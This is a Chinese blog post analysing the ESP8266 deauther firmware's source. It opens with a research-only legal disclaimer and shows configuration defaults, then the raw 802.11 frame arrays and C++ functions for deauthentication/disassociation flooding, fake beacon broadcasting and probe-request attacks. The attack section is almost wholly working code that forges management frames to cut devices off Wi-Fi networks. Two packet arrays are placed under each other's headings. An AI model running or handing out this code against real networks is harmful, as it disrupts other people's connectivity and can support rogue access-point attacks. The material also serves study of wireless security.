esp8266_deauther的实现过程及一些思考4——源码分析

最新推荐文章于 2024-06-23 10:45:27 发布

oaimgo

最新推荐文章于 2024-06-23 10:45:27 发布

阅读量2.4k

点赞数 3

分类专栏： ESP8266 硬件文章标签： esp8266 arduino

本文链接：https://blog.csdn.net/mjx19951117/article/details/96904762

版权

硬件同时被 2 个专栏收录

6 篇文章 0 订阅

订阅专栏

ESP8266

5 篇文章 0 订阅

订阅专栏

这一系列的文章仅作技术研究，请遵守相关法律（中华人民共和国网络安全法），请勿使用相关技术来攻击他人！

1 软件配置方法

1.1wifi相关配置

这一部分的配置在wifi.h文件中，这里规定了web文件的位置，已经wifi的配置。比如登陆的ip地址，默认是192.168.4.1，默认的子网掩码是255.255.255.0。

// Server and other global objects
ESP8266WebServer server(80);
DNSServer dnsServer;
IPAddress apIP(192, 168, 4, 1);
IPAddress netMsk(255, 255, 255, 0);
File fsUploadFile;

// current WiFi mode and config
uint8_t wifiMode = WIFI_MODE_OFF;

bool   wifi_config_hidden        = false;
bool   wifi_config_captivePortal = false;
String wifi_config_ssid;
String wifi_config_password;
String wifi_config_path;

1.2核心配置

这一部分的配置在Setting.h中，比如版本号、攻击超时时间、wifi的channel、SSID、password、是否隐藏SSID、语言等。比如登陆使用的SSID默认为pwned，密码默认为deauther，默认的语言为英语。本来想做一个汉化包进去方便中国爱好者使用，后来发现在V2.1中，已经加入了中文语言包。V2.1web页面支持的语言包括：cn中文、cs捷克语、de德语、en英语、es西班牙语、fi芬兰语、fr法语、it意大利语、ro罗马尼亚语、ru俄语、tlh克林贡语

bool changed = false;

String version = VERSION;

bool beaconChannel = false;
bool autosave = true;
bool beaconInterval = false;
bool cli = true;
bool displayInterface = USE_DISPLAY;
bool webInterface = true;
bool webSpiffs = false;
bool randomTX = false;
bool ledEnabled = true;
bool serialEcho = true;

uint32_t attackTimeout = 600;
uint32_t autosaveTime = 10000;
uint32_t displayTimeout = 600;
uint16_t deauthsPerTarget = 20;
uint16_t chTime = 384;
uint16_t minDeauths = 3;
uint8_t forcePackets = 1;
uint8_t channel = 9;
uint8_t deauthReason = 1;
uint8_t *macSt;
uint8_t *macAP;
uint8_t probesPerSSID = 1;

String ssid = "pwned";
String password = "deauther";
bool hidden = false;
bool captivePortal = true;
String lang = "en";

（3）其他配置
其他的配置设及到一些关键的数据结构，这里没有多做研究。

2 网络攻击核心代码解析

2.1 deauth攻击

（1）deauth攻击数据包deauthPacket[26]的结构

uint8_t deauthPacket[26] = {
    /*  0 - 1  */ 0xC0, 0x00,                         // type, subtype c0: deauth (a0: disassociate)
    /*  2 - 3  */ 0x00, 0x00,                         // duration (SDK takes care of that)
    /*  4 - 9  */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // reciever (target)
    /* 10 - 15 */ 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // source (ap)
    /* 16 - 21 */ 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // BSSID (ap)
    /* 22 - 23 */ 0x00, 0x00,                         // fragment & squence number
    /* 24 - 25 */ 0x01, 0x00                          // reason code (1 = unspecified reason)
}

（2）deauth攻击核心代码

bool Attack::deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_t ch) {
    if (!stMac) return false;  // exit when station mac is null

    // Serial.println("Deauthing "+macToStr(apMac)+" -> "+macToStr(stMac)); // for debugging

    bool success = false;

    // build deauth packet
    packetSize = sizeof(deauthPacket);
    memcpy(&deauthPacket[4], stMac, 6);
    memcpy(&deauthPacket[10], apMac, 6);
    memcpy(&deauthPacket[16], apMac, 6);
    deauthPacket[24] = reason;

    // send deauth frame
    deauthPacket[0] = 0xc0;

    if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
        success = true;
        deauth.packetCounter++;
    }

    // send disassociate frame
    deauthPacket[0] = 0xa0;

    if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
        success = true;
        deauth.packetCounter++;
    }

    // send another packet, this time from the station to the accesspoint
    if (!macBroadcast(stMac)) { // but only if the packet isn't a broadcast
        // build deauth packet
        memcpy(&deauthPacket[4], apMac, 6);
        memcpy(&deauthPacket[10], stMac, 6);
        memcpy(&deauthPacket[16], stMac, 6);

        // send deauth frame
        deauthPacket[0] = 0xc0;

        if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
            success = true;
            deauth.packetCounter++;
        }

        // send disassociate frame
        deauthPacket[0] = 0xa0;

        if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
            success = true;
            deauth.packetCounter++;
        }
    }

    if (success) deauth.time = currentTime;

    return success;
}

2.2 beacon攻击

（1）beacon攻击数据包beaconPacket[68]的结构

uint8_t probePacket[68] = {
    /*  0 - 1  */ 0x40, 0x00,                         // Type: Probe Request
    /*  2 - 3  */ 0x00, 0x00,                         // Duration: 0 microseconds
    /*  4 - 9  */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // Destination: Broadcast
    /* 10 - 15 */ 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, // Source: random MAC
    /* 16 - 21 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // BSS Id: Broadcast
    /* 22 - 23 */ 0x00, 0x00,                         // Sequence number (will be replaced by the SDK)
    /* 24 - 25 */ 0x00, 0x20,                         // Tag: Set SSID length, Tag length: 32
    /* 26 - 57 */ 0x20, 0x20, 0x20, 0x20,             // SSID
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
    /* 58 - 59 */ 0x01, 0x08, // Tag Number: Supported Rates (1), Tag length: 8
    /* 60 */ 0x82,            // 1(B)
    /* 61 */ 0x84,            // 2(B)
    /* 62 */ 0x8b,            // 5.5(B)
    /* 63 */ 0x96,            // 11(B)
    /* 64 */ 0x24,            // 18
    /* 65 */ 0x30,            // 24
    /* 66 */ 0x48,            // 36
    /* 67 */ 0x6c             // 54
}

（2）beacon攻击核心代码

bool Attack::sendBeacon(uint8_t* mac, const char* ssid, uint8_t ch, bool wpa2) {
    packetSize = sizeof(beaconPacket);

    if (wpa2) {
        beaconPacket[34] = 0x31;
    } else {
        beaconPacket[34] = 0x21;
        packetSize      -= 26;
    }

    int ssidLen = strlen(ssid);

    if (ssidLen > 32) ssidLen = 32;

    memcpy(&beaconPacket[10], mac, 6);
    memcpy(&beaconPacket[16], mac, 6);
    memcpy(&beaconPacket[38], ssid, ssidLen);

    beaconPacket[82] = ch;

    // =====
    uint16_t tmpPacketSize = (packetSize - 32) + ssidLen;                // calc size
    uint8_t* tmpPacket     = new uint8_t[tmpPacketSize];                 // create packet buffer
    memcpy(&tmpPacket[0], &beaconPacket[0], 38 + ssidLen);               // copy first half of packet into buffer
    tmpPacket[37] = ssidLen;                                             // update SSID length byte
    memcpy(&tmpPacket[38 + ssidLen], &beaconPacket[70], wpa2 ? 39 : 13); // copy second half of packet into buffer

    if (sendPacket(tmpPacket, tmpPacketSize, ch, settings.getForcePackets())) {
        beacon.time = currentTime;
        beacon.packetCounter++;
        delete tmpPacket; // free memory of allocated buffer
        return true;
    } else {
        delete tmpPacket; // free memory of allocated buffer
        return false;
    }
    // =====
}

2.3 probe攻击

（1）probe攻击数据包probePacket[109]的结构

uint8_t beaconPacket[109] = {
    /*  0 - 3  */ 0x80, 0x00, 0x00, 0x00,             // Type/Subtype: managment beacon frame
    /*  4 - 9  */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // Destination: broadcast
    /* 10 - 15 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // Source
    /* 16 - 21 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // Source

    // Fixed parameters
    /* 22 - 23 */ 0x00, 0x00,                                     // Fragment & sequence number (will be done by the SDK)
    /* 24 - 31 */ 0x83, 0x51, 0xf7, 0x8f, 0x0f, 0x00, 0x00, 0x00, // Timestamp
    /* 32 - 33 */ 0xe8, 0x03,                                     // Interval: 0x64, 0x00 => every 100ms - 0xe8, 0x03 => every 1s
    /* 34 - 35 */ 0x31, 0x00,                                     // capabilities Tnformation

    // Tagged parameters

    // SSID parameters
    /* 36 - 37 */ 0x00, 0x20, // Tag: Set SSID length, Tag length: 32
    /* 38 - 69 */ 0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20,
                  0x20, 0x20, 0x20, 0x20, // SSID

    // Supported Rates
    /* 70 - 71 */ 0x01, 0x08, // Tag: Supported Rates, Tag length: 8
    /* 72 */ 0x82,            // 1(B)
    /* 73 */ 0x84,            // 2(B)
    /* 74 */ 0x8b,            // 5.5(B)
    /* 75 */ 0x96,            // 11(B)
    /* 76 */ 0x24,            // 18
    /* 77 */ 0x30,            // 24
    /* 78 */ 0x48,            // 36
    /* 79 */ 0x6c,            // 54

    // Current Channel
    /* 80 - 81 */ 0x03, 0x01, // Channel set, length
    /* 82 */ 0x01,            // Current Channel

    // RSN information
    /*  83 -  84 */ 0x30, 0x18,
    /*  85 -  86 */ 0x01, 0x00,
    /*  87 -  90 */ 0x00, 0x0f, 0xac, 0x02,
    /*  91 -  92 */ 0x02, 0x00,
    /*  93 - 100 */ 0x00, 0x0f, 0xac, 0x04, 0x00, 0x0f, 0xac, 0x04, /*Fix: changed 0x02(TKIP) to 0x04(CCMP) is default. WPA2 with TKIP not supported by many devices*/
    /* 101 - 102 */ 0x01, 0x00,
    /* 103 - 106 */ 0x00, 0x0f, 0xac, 0x02,
    /* 107 - 108 */ 0x00, 0x00}

（2）probe攻击核心代码

bool Attack::sendProbe(uint8_t* mac, const char* ssid, uint8_t ch) {
    packetSize = sizeof(probePacket);
    int ssidLen = strlen(ssid);

    if (ssidLen > 32) ssidLen = 32;

    memcpy(&probePacket[10], mac, 6);
    memcpy(&probePacket[26], ssid, ssidLen);

    if (sendPacket(probePacket, packetSize, ch, settings.getForcePackets())) {
        probe.time = currentTime;
        probe.packetCounter++;
        return true;
    }

    return false;
}